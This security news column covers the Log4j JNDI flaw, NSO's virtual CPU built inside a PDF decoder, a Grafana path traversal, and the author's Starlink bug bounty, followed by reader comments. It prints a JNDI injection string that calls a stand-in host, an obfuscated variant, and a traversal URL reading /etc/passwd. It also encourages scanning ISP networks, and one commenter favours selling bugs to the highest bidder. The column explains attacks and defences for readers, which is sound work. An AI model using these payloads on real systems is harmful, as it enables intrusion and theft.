The big news this week is Log4j, which broke just a few hours too late to be included in last week’s column. Folks are already asking if this is the most severe vulnerability ever, and it does look like it’s at least in the running. The bug was first discovered by security professionals at Alibaba, who notified Apache of the flaw on November 24th. Cloudflare has pulled their data and found evidence of the vulnerability being exploited in the wild as early as December 1st. These early examples are very sparse and extremely targeted, enough to make me wonder if this wasn’t researchers who were part of the initial disclosure doing further research on the problem. Regardless, on December 9th, a Twitter user tweeted the details of the vulnerability, and security hell broke loose. Nine minutes after the tweet, Cloudflare was seeing exploit attempts again, and within eight hours, they were dealing with 20,000 exploit attempts per minute.

That’s the timeline, but what’s going on with the exploit, and why is it so bad? First, the vulnerable package is Log4j, a logging library for Java. It gets log messages where they need to go, with a bunch of bells and whistles included. One of those features is support for JNDI (the Java Naming and Directory Interface), a known security problem in Java. A JNDI request can lead to a deserialization attack, where a maliciously crafted incoming data stream misbehaves when it is expanded back into an object. Those JNDI lookups were never intended to be performed across the Internet, but there wasn’t an explicit check preventing it, so here we are.

The upshot is that if you can trigger a log write through Log4j that includes ${jndi:ldap://example.com/a}, you can run arbitrary code on that machine. Researchers and criminals have already come up with creative ways to manage that, like including the string in a browser’s User-Agent header, or in a first name field. Yes, it’s the return of little Bobby Tables. The fix is to update to Log4j 2.16.0; 2.15.0 contained a partial fix, but didn’t fully eliminate the problem. Recent Java releases have also changed a default setting (com.sun.jndi.ldap.object.trustURLCodebase now defaults to false), providing partial mitigation. But we probably haven’t seen the end of this one yet.
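To make the injection point concrete, here is a minimal Go sketch of the naive string filter many people reached for first. The function name is hypothetical, and this is a detection illustration, not a mitigation. Log4j’s lookup syntax nests, so an obfuscated payload like the last input sails right past it. Updating Log4j is the actual fix.

```go
package main

import (
	"fmt"
	"strings"
)

// containsJNDILookup reports whether s contains a literal Log4j-style JNDI
// lookup such as "${jndi:ldap://example.com/a}". It is deliberately naive:
// lowercasing catches "${JNDI:...}", but nested lookups such as
// "${${lower:j}ndi:...}" never contain the literal substring and slip past.
func containsJNDILookup(s string) bool {
	return strings.Contains(strings.ToLower(s), "${jndi:")
}

func main() {
	inputs := []string{
		"Mozilla/5.0 (X11; Linux x86_64)",
		"${jndi:ldap://example.com/a}",
		"${JNDI:ldap://example.com/a}",
		"${${lower:j}ndi:ldap://example.com/a}",
	}
	for _, in := range inputs {
		fmt.Printf("flagged=%-5v %s\n", containsJNDILookup(in), in)
	}
}
```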

NSO and the CPU Emulated in a PDF

Had it been anyone other than Google’s Project Zero telling this story, I would have blown it off as a bad Hollywood plot device. This vulnerability is in the iOS iMessage app, specifically in how it handles .gif files that actually contain PDF data. PDFs are flexible, to put it mildly. One of the possible encoding formats is JBIG2, a black-and-white compression codec from 2000. Part of the codec is the ability to use the Boolean operators AND, OR, XOR, and XNOR to represent minor differences between compressed blocks. An integer overflow in the decompression code allows much more memory to be considered valid output for decompression, which means the decompression code can run those Boolean operators on that extra memory.
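Project Zero’s write-up has the specifics of Apple’s JBIG2 code. What follows is only a generic Go sketch of this bug class, with made-up dimensions and hypothetical function names. A size computed in 32-bit unsigned arithmetic wraps around, so a bounds check on the wrapped value passes even though the real region is enormous.

```go
package main

import "fmt"

// naiveRegionSize computes w*h the way a careless decoder might: in 32-bit
// unsigned arithmetic, which silently wraps around on overflow.
func naiveRegionSize(w, h uint32) uint32 {
	return w * h
}

// safeRegionSize performs the same multiplication but reports overflow
// instead of wrapping.
func safeRegionSize(w, h uint32) (uint32, bool) {
	if w != 0 && h > ^uint32(0)/w {
		return 0, false
	}
	return w * h, true
}

func main() {
	const bufLen = 4096                   // bytes actually allocated for the output bitmap
	w, h := uint32(0x40000100), uint32(4) // attacker-chosen dimensions

	n := naiveRegionSize(w, h) // true product is about 4 GiB, wraps to 1024
	fmt.Printf("naive size %d passes the bounds check: %v\n", n, n <= bufLen)

	if _, ok := safeRegionSize(w, h); !ok {
		fmt.Println("checked multiplication rejects the dimensions")
	}
}
```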

Now what do you get when you have plenty of memory and those four operators? A Turing-complete CPU, of course. Yes, researchers at the NSO Group really built a virtual CPU in a PDF decoding routine, and used that platform to bootstrap their sandbox escape. It’s insane, unbelievable, and brilliant. [Ed Note: Too bad the NSO Group is essentially evil.]
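Why are those four operators enough? XNOR(a, a) is always 1, and XOR with 1 flips a bit, so NOT comes for free. AND plus NOT can build any Boolean function. The Go sketch below wires the four operators, applied to single bits, into a ripple-carry adder. It illustrates the principle only. NSO’s actual construction operated on JBIG2 bitmap segments and was vastly more elaborate.

```go
package main

import "fmt"

// The four combination operators JBIG2 offers, applied here to single bits.
func and(a, b uint8) uint8  { return a & b }
func or(a, b uint8) uint8   { return a | b }
func xor(a, b uint8) uint8  { return a ^ b }
func xnor(a, b uint8) uint8 { return 1 ^ (a ^ b) }

// not is derived, not primitive: XNOR(a, a) is constant 1, and XOR with 1 flips a bit.
func not(a uint8) uint8 { return xor(a, xnor(a, a)) }

// fullAdder adds three bits using only the gates above.
func fullAdder(a, b, cin uint8) (sum, cout uint8) {
	p := xor(a, b)
	sum = xor(p, cin)
	cout = or(and(a, b), and(p, cin))
	return
}

// add8 chains eight full adders into a ripple-carry adder (wraps mod 256).
func add8(x, y uint8) uint8 {
	var result, carry uint8
	for i := 0; i < 8; i++ {
		var s uint8
		s, carry = fullAdder((x>>i)&1, (y>>i)&1, carry)
		result |= s << i
	}
	return result
}

func main() {
	fmt.Println(add8(100, 55))  // 155
	fmt.Println(add8(200, 100)) // 44, since 300 wraps mod 256
	fmt.Println(not(0), not(1)) // 1 0
}
```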

Grafana Path Traversal

The Grafana visualization platform just recently fixed a serious problem, CVE-2021-43798. This vulnerability allows for path traversal via the plugin folders. For instance, /public/plugins/alertlist/../../../../../../../../etc/passwd would return the passwd file from a Linux server. The updates fixing this issue were released on December 7th. This bug was actually a 0-day for a few days, as it was being discussed publicly on the 3rd while still unknown to the Grafana devs. Check out their postmortem for the details.
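The standard defence is to resolve the requested path first, then verify it still lies inside the directory it is supposed to. Here is a minimal Go sketch of that check. It is not Grafana’s actual patch, and the function name and install path are hypothetical.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

var errTraversal = errors.New("requested path escapes the plugin directory")

// resolvePluginFile maps a requested relative path onto a file inside
// pluginDir and refuses anything that would resolve outside it.
func resolvePluginFile(pluginDir, requested string) (string, error) {
	base := filepath.Clean(pluginDir)
	full := filepath.Join(base, requested) // Join also cleans, collapsing "../" segments
	rel, err := filepath.Rel(base, full)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errTraversal
	}
	return full, nil
}

func main() {
	dir := "/usr/share/grafana/plugins/alertlist" // hypothetical install path
	for _, req := range []string{"img/logo.svg", "../../../../../../../../etc/passwd"} {
		p, err := resolvePluginFile(dir, req)
		fmt.Printf("%q -> %q (err: %v)\n", req, p, err)
	}
}
```

Because filepath.Join cleans the result, the containment test runs on where the request actually lands rather than on the raw string.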

Starlink

And finally, I have some original research to cover. You may be familiar with my work covering the Starlink satellite internet system. Part of the impetus for buying and keeping Starlink was to do security research on the platform, and that goal has finally borne some fruit, to the tune of a $4,800 bounty. Here’s the story.

I have a nearby friend who also uses Starlink, and on December 7th, we found that we had both been assigned a publicly routable IPv4 address. How does Starlink’s routing work between subscribers? Would traffic sent from my network to his be routed directly on the satellite, or would each packet have to bounce off the satellite, through SpaceX’s ground station, back to the bird, and then finally back to me? Traceroute is a wonderful tool, and it answered the question:

    traceroute to 98.97.92.x (98.97.92.x), 30 hops max, 46 byte packets
     1  customer.dllstxx1.pop.starlinkisp.net (98.97.80.1)  25.830 ms  24.020 ms  23.082 ms
     2  172.16.248.6 (172.16.248.6)  27.783 ms  23.973 ms  27.363 ms
     3  172.16.248.21 (172.16.248.21)  23.728 ms  26.880 ms  28.299 ms
     4  undefined.hostname.localhost (98.97.92.x)  59.220 ms  51.474 ms  51.877 ms

We didn’t know exactly what each hop was, but the number of hops and the latency to each make it fairly clear that our traffic was going through a ground station. But there’s something odd about this traceroute. Did you spot it? 172.16.x.y is a private address range, as per RFC 1918. The fact that it shows up in a traceroute means that my OpenWRT router and Starlink equipment are successfully routing from my desktop to that address. Now, I’ve found this sort of thing before, on a different ISP’s network. Knowing that this could be interesting, I launched nmap and scanned the private IPs that showed up in the traceroute. Bingo.



172.16.248.6 was appropriately locked down, but 172.16.248.21 showed open ports. Namely, ports 179, 9100, 9101, and 50051. Nmap thought 179 was BGP, which sounded about right. But the rest of them? Telnet. I was fairly confident that none of these were actually telnet services, but it’s a great start when trying to identify an unknown service. This was no exception. Ports 9100 and 9101 told me I had made a bad request, throwing error 400s. Ah, they were HTTP services! Pulling both up in a web browser gave me a debug output that appeared to be from a Python Flask server.


That last port, 50051, was interesting. The only service I could find that normally runs there was Google’s gRPC, a Remote Procedure Call protocol. The grpc_cli tool came in handy to confirm that was what I had found. Unfortunately, server reflection was disabled, meaning that the service refused to enumerate the commands it supported. Mapping any commands would require throwing a bunch of data at that port.

At this point, I began to wonder exactly what piece of hardware I was talking to. It did BGP, it was internal to Starlink’s network, and my traffic was routing through it. Could this be a satellite? Probably not, but the Starlink bug bounty is pretty clear about what should come next. Under no circumstances should a researcher do live testing on a satellite or other critical infrastructure. I suspected I was talking to part of their routing infrastructure, probably at the ground station in Dallas. Either way, poking too hard and breaking something was frowned upon, so I wrote up the disclosure on what I had found.

Starlink engineers had the ports closed within twelve hours of the report, and asked me to double-check their triage. Sure enough, while I could still ping the private IPs, no ports were open. Here is where I must credit the guys that run SpaceX’s Starlink bug bounty. They could have called this a simple information disclosure, paid a few hundred dollars, and called it a day. Instead, they took the time to investigate and confirmed that I had indeed discovered an open gRPC port, and then dropped the bombshell that it was an unauthenticated endpoint. The finding netted a $3,800 initial award, plus a bonus $1,000 for a comprehensive report and not crashing their live systems. As my local friend half-jokingly put it, that’s a lot of money for running nmap.

Yes, there was a bit of luck involved, combined with a whole lot of prior experience with network quirks. The main takeaway should be that security research doesn’t always have to involve super-complicated vulnerability discovery and exploit development. You don’t have to build a Turing-complete system in a PDF. Sometimes it’s just IP and port scanning, combined with persistence and a bit of luck. In fact, if your ISP has a bug bounty program, you might try plugging a Linux machine directly into the modem and scanning the private IP ranges. Keep your eyes open. You too just might find something interesting.

$4,800 is a nice Christmas present… Do you have to pay taxes on this, so the final amount will be less?

I’m already self-employed, so it’ll get reported with the rest of my earnings, and be subject to self-employment tax. Taxes are a pain.

>Taxes are a pain.

Yeah, but that’s what keeps the public infrastructure and stuff running… (Of course, one can always discuss HOW exactly the money is spent…)

BTW, missing word: “while I could still the private IPs” -> “while I could still SCAN/PING/…?? the private IPs”

And: “In fact, if your ISP has a bug bounty program, you might try plugging a Linux machine directly into the modem, and scanning the private IP range. Keep your eyes open. You too just might find something interesting.” -> or you might get sued if the ISP is evil… I don’t think my ISP has a bug bounty program, and I am afraid that even white hats can get into a lot of trouble…

No, I think he meant he could diSTILL the private IPs, increasing their proof above that of IPA!

B^)

The person that tweeted the log4j hack should be used as an example and publicly executed.

Whaha, I had to read it twice woops

(wait you mean the exploit needs to be executed publicly right?)

NSO Group bad, NSA good – repeat after me – NSO bad..

It’s still a clever hack right out of early console/demo scene days where limitations were the word of the day.

I love the stories, thx Jonathan, going to celebrate the weekend smiling :)

The emulated CPU in a PDF is brilliant! Sure, it was made for malicious purposes but that doesn’t make it less brilliant.

It is not guaranteed that you can route TO those IPs. traceroute sends a packet toward the destination, and the error message is signed: “best regards, your router XYZ”. That doesn’t mean that packets addressed to that IP would be routed.

I *think* that when an IP shows up in a Traceroute, you can indeed route to it. When you get hops that are just asterisks, that means you can’t route to it. But this is an interesting point, and I’ll have to do some research to confirm.

OK, so on looking deeper, I think you’re right, at least for the Linux traceroute command. Traceping is the utility that also pings each hop.

The fact he got a response when trying to connect to the ports means he was able to route to those IPs.

As for traceroute, it uses IGMP to get the response. It intentionally sets the TTL in the IP packet to a small number, and the last hop the packet got to sends a timeout IGMP response.

Theoretically, you could have a network block/firewall at the edge preventing routing to those IPs. This would be good security. But if there’s no intentional firewall, then getting an IGMP response means you have routing from those IPs… and routing is typically bidirectional.

Almost right: ICMP, not IGMP. The latter is used with multicast.

The reason someone sees RFC1918 addresses in traceroute output usually boils down to the operator forgetting to turn off TTL propagation in MPLS. MPLS has a very effective way to hide the topology: usually you see the entry point and the exit point, and there might be loads of intermediate hops that forward the packets you sent, but with TTL propagation off, the packet’s TTL will not decrease, so traceroute doesn’t get responses from those intermediate hops. Forget to turn this off, and suddenly the hidden devices become visible again.
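Here is a toy Go model of the effect described above. It is heavily simplified. Real LSRs forward on a separate label TTL, while this model just lets hidden routers skip the decrement. The path uses documentation and private addresses, not anyone’s real network, and every name in it is hypothetical.

```go
package main

import "fmt"

// hop is a router on the path in this toy model.
type hop struct {
	addr      string
	hiddenLSR bool // interior MPLS router meant to stay out of sight
}

// traceroute mimics the classic technique: send probes with TTL 1, 2, 3, ...
// and record who answers each one. A router that decrements the TTL to zero
// answers with ICMP time exceeded; a probe that survives every router reaches
// the destination, which answers itself. With propagation disabled, hidden
// LSRs leave the TTL untouched, so they never expire a probe.
func traceroute(routers []hop, dest string, propagate bool) []string {
	const maxHops = 30 // traceroute's usual default limit
	var seen []string
	for ttl := 1; ttl <= maxHops; ttl++ {
		responder := dest
		remaining := ttl
		for _, r := range routers {
			if r.hiddenLSR && !propagate {
				continue
			}
			remaining--
			if remaining == 0 {
				responder = r.addr
				break
			}
		}
		seen = append(seen, responder)
		if responder == dest {
			break
		}
	}
	return seen
}

func main() {
	routers := []hop{
		{"192.0.2.1", false}, // ingress edge router
		{"10.0.0.1", true},
		{"10.0.0.2", true},
		{"192.0.2.9", false}, // egress edge router
	}
	fmt.Println("propagation on: ", traceroute(routers, "198.51.100.7", true))
	fmt.Println("propagation off:", traceroute(routers, "198.51.100.7", false))
}
```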

Also, a lesser-known fact is that you see the egress interface IP address in the traceroute output: those ICMP error messages are generated locally by each hop, so they use the address of the interface that the route back toward your client points to. So it is entirely possible that you will see responses from addresses that you cannot possibly reach.

Just remember: packets are forwarded based on their destination address; in normal routed networks, no packet-forwarding device cares about the source address (unless specifically instructed to do otherwise).

Java: solution in search of a problem.

How does that explain the thousands and thousands of java based web sites? Just curious about how you came up with this factoid.

Nope, I’m with him on this. Java’s big claim was it could be written once and run anywhere, but webservers are one of the most standardised environments to run code, which makes this completely superfluous.

Having managed a Tomcat webserver, I don’t want to do it again. Apache or LiteSpeed is far better.

Besides, how many websites really needed the ability to retrieve an object from a remote server to make a log entry? That’s classic Java overcomplexity and bloat.

Java: a problem trying to convince some fool that it’s a solution.

I like my version better.

> The Grafana visualization platform just recently fixed a serious problem, CVE-2021-43798. This vulnerability allows for path traversal via the plugin folders.

Some slightly older versions of Grafana (before commit 40643ee023cb908d9edd1fe24e4dbca418a139e8) will only allow path traversal to files with one of these extensions:

    var permittedFileExts = []string{
        ".html", ".xhtml", ".css", ".js", ".json", ".jsonld", ".map", ".mjs",
        ".jpeg", ".jpg", ".png", ".gif", ".svg", ".webp", ".ico",
        ".woff", ".woff2", ".eot", ".ttf", ".otf",
        ".wav", ".mp3",
        ".md", ".pdf", ".txt",
    }

So if you’re running one of those versions and can’t update immediately, you might want to check that there are no incriminating files with those extensions lurking.

I once found a really nice overflow bug in the NT kernel that triggered a BSOD. It was in Microsoft code for sure, and I don’t have experience debugging the kernel, so I just reported it as a DoS, because I couldn’t go further without a lot of research and worried that someone was using it in the wild. They told me it was my fault for triggering the BSOD by passing malformed data, and refused to pay out or fix it. I have also reported XSS that could steal tokens, information disclosure, and permission bypasses to multiple web services with bug bounties. I haven’t gotten a single cent from any of this.

How do you guys manage to get paid for this stuff? The official channels don’t work for me.

I’ve never even tried to get paid from the publisher bug bounty program. I think it is against the spirit of doing business to sell to the single lowest bidder, when there are multiple parties offering significantly higher price for your product.

Interesting about 9100 and 9101, I thought they were ports for printers?

Those are Prometheus metrics exporters (agents gathering metrics). According to https://github.com/prometheus/prometheus/wiki/Default-port-allocations

* 9100 is node exporter (system stats like CPU, disk, network)

* 9101 is HAProxy exporter (metrics about an HAProxy instance)

Interesting that they’ve taken on that use now (well, since 2014 I’d assume?), and thanks for the heads up; that sounds interesting. Networking is something I’m only getting into again recently and what I know is from the early 2000s. I apologize if any of the below is redundant/boring:

Regarding printers, see: http://hacking-printers.net/wiki/index.php/Port_9100_printing

Maybe they’re really big Splinter Cell fans? Joking, but these links have some more interesting info (most of which is for Prometheus or HP printers, I guess): https://www.speedguide.net/port.php?port=9100

https://www.speedguide.net/port.php?port=9101

It makes sense that they’d be used for what you say, I guess to provide statistics specifically on the network itself, whether it’s up/down/slow? Maybe that’s what the debug output is, I have no idea about that.

I am 100% sure that output is Prometheus node exporter. I’ve seen it a lot recently. That’s the response the exporter (the agent running on the thing being monitored) gives to the Prometheus server when it periodically comes to scrape metrics.

Node exporter is one of the most common agents installed. It gathers a ton of system stats like RAM, CPU, disk I/O, network I/O, filesystem usage, etc.
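For anyone curious what that scrape output looks like, exporters serve Prometheus’s plain-text exposition format: one `metric_name{labels} value` line per sample, plus comment lines. If the commenters are right that ports 9100 and 9101 were exporters, the page would have looked like that. Here is a minimal Go parser sketch. It handles only the simple cases, and the sample lines are illustrative, not the actual Starlink output.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// sample is one parsed line of the Prometheus text exposition format.
type sample struct {
	Name   string
	Labels map[string]string
	Value  float64
}

// parseSample handles lines such as
//
//	node_load1 0.42
//	node_cpu_seconds_total{cpu="0",mode="idle"} 12345.67
//
// It skips comments and ignores an optional trailing timestamp, but it does
// not handle escaped quotes, commas, or braces inside label values.
func parseSample(line string) (sample, bool) {
	line = strings.TrimSpace(line)
	if line == "" || strings.HasPrefix(line, "#") {
		return sample{}, false
	}
	s := sample{Labels: map[string]string{}}
	var rest string
	if i := strings.IndexByte(line, '{'); i >= 0 {
		j := strings.LastIndexByte(line, '}')
		if j < i {
			return sample{}, false
		}
		s.Name = line[:i]
		for _, pair := range strings.Split(line[i+1:j], ",") {
			k, v, ok := strings.Cut(pair, "=")
			if !ok {
				continue // empty entry, e.g. from a trailing comma
			}
			s.Labels[strings.TrimSpace(k)] = strings.Trim(strings.TrimSpace(v), `"`)
		}
		rest = line[j+1:]
	} else {
		name, after, ok := strings.Cut(line, " ")
		if !ok {
			return sample{}, false
		}
		s.Name, rest = name, after
	}
	fields := strings.Fields(rest) // value, then an optional timestamp
	if len(fields) == 0 {
		return sample{}, false
	}
	v, err := strconv.ParseFloat(fields[0], 64)
	if err != nil {
		return sample{}, false
	}
	s.Value = v
	return s, true
}

func main() {
	lines := []string{
		"# HELP node_load1 1m load average.",
		"# TYPE node_load1 gauge",
		"node_load1 0.42",
		`node_cpu_seconds_total{cpu="0",mode="idle"} 12345.67`,
	}
	for _, l := range lines {
		if s, ok := parseSample(l); ok {
			fmt.Printf("%s %v = %g\n", s.Name, s.Labels, s.Value)
		}
	}
}
```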

What makes you sure that specific output is Prometheus, then? I’m less convinced now that you left this reply.

Ports 9100 and 9101 answering with HTTP are Prometheus metrics exporters (aka metrics-gathering agents for Prometheus).

According to this: https://github.com/prometheus/prometheus/wiki/Default-port-allocations

* 9100 is the well-known port for node exporter (system metrics like CPU, disk, network)

* 9101 is the exporter for HAProxy metrics.

I’ve happened to be working on a Prometheus exporter for a specific app, so that output is top of mind right now.

Are you sure that gRPC exposure isn’t just the same endpoint that your Starlink app uses to pull debug data? Because that gRPC endpoint has been documented previously.

Would be great to be paid for your data on these levels, wow! $4,800, cookies are cheaper, so I wonder if it is possible to send polarity to your house’s grounds, you know, satellite dishes and antennas or lightning rods, on the same signal, and be part of the electronic tolerance of your monitor, lights, sockets, solar panels, etc… just saying! Mmm… like NSO making a CPU out of trash. On the other hand, could we convert those signals to electric impulses at the levels of communication of your nerves, eyes, ears, muscles, etc.? Call me paranoid, but those thoughts went through my mind. What do you think about it, is it possible? And please don’t call me out about my poor English; I am only an ignorant, some people near me told me.

Ain’t that bug too basic for $4,800?

Good bug bounties pay for severity, not just complexity.

In many ways the two are linked: if it’s stupidly complex, it often becomes less severe through the near impossibility of getting it all to actually happen, even if the scope of the flaw is far greater.

Good job and congrats on the reward!

Hey, if you happen to find anything called “Leviathan” in there just take it out, nevermind the rule about not causing damage.